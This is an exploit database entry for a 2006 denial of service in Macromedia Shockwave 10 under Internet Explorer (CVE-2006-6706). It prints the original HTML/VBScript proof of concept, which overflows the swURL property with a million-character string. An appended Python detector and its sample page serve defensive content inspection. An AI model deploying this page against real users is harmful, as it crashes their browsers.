Vendor: Shockwave Player
By: shinnai
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 119
Product Name: Shockwave Player
Affected Version From: Macromedia Shockwave 10
Affected Version To: Macromedia Shockwave 10
Patch Exists: YES
Related CVE: CVE-2006-6706
CPE: a:macromedia:shockwave_player:10.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2006

Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service

This exploit causes a denial of service in Internet Explorer when a maliciously crafted Shockwave file is opened. The vulnerability is caused by a boundary error in the handling of Shockwave files: passing an overly long argument to the swURL property of the Shockwave ActiveX control causes a stack-based buffer overflow.

Mitigation:

Upgrade to the latest version of Macromedia Shockwave 10

Exploit-DB raw data:

<!--
---------------------------------------------------------------------------
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>

argCount = 1

arg1=String(1000000, "A")

ShockW.swURL = arg1

</script>
</html>

# milw0rm.com [2006-12-29]
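
A static check for the pattern shown above, added here as an example and not part of the original entry: it flags pages that instantiate the Shockwave control by its CLSID and assign an oversized value to swURL, following simple VBScript variable indirection. The function names, the 2048-character threshold and the sample page are assumptions.

```python
import re
from html.parser import HTMLParser

CLSID = "233C1507-6A77-46A4-9443-F871F945D258"  # Shockwave control, from the PoC
MAX_SWURL_LEN = 2048  # assumed threshold, not a vendor-documented limit
_ASSIGN = re.compile(r'^[ \t]*([\w.]+)[ \t]*=[ \t]*(.+?)[ \t\r]*$', re.M)
_STRING_CALL = re.compile(r'^String\(\s*(\d+)\s*,\s*"[^"]*"\s*\)$', re.I)
# Constructed sample with the same shape as the PoC on this page.
SAMPLE = ("<object classid='clsid:%s' id='Sw'></object><script language='vbscript'>\n"
          "buf = String(1000000, \"A\")\nSw.swURL = buf\n</script>" % CLSID)

class _Page(HTMLParser):
    """Collects ids of <object> tags bound to the control, plus script text."""
    def __init__(self):
        super().__init__()
        self.object_ids, self.script, self._in_script = set(), [], False
    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "object" and CLSID.lower() in (attrs.get("classid") or "").lower():
            self.object_ids.add((attrs.get("id") or "").lower())
        self._in_script = tag == "script"
    def handle_endtag(self, tag):
        self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.script.append(data)

def _length(expr, variables):
    # Resolve a VBScript String(n, c) call, a string literal, or a known variable.
    if m := _STRING_CALL.match(expr):
        return int(m.group(1))
    if len(expr) >= 2 and expr[0] == expr[-1] == '"':
        return len(expr) - 2
    return variables.get(expr.lower())  # None when the size cannot be resolved

def find_oversized_swurl(html):
    """Return [(assignment target, resolved length)] for oversized swURL values."""
    page = _Page()
    page.feed(html)
    page.close()
    findings, variables = [], {}
    for target, expr in _ASSIGN.findall("".join(page.script)):
        size = _length(expr, variables)
        obj, _, prop = target.lower().rpartition(".")  # VBScript is case-insensitive
        if obj in page.object_ids and prop == "swurl" and (size or 0) > MAX_SWURL_LEN:
            findings.append((target, size))
        elif not obj and size is not None:
            variables[prop] = size  # remember sizes of plain variables
    return findings
```

This is a heuristic for proxy or mail-gateway content inspection: it only resolves literal sizes, so script that builds the string dynamically will not be caught.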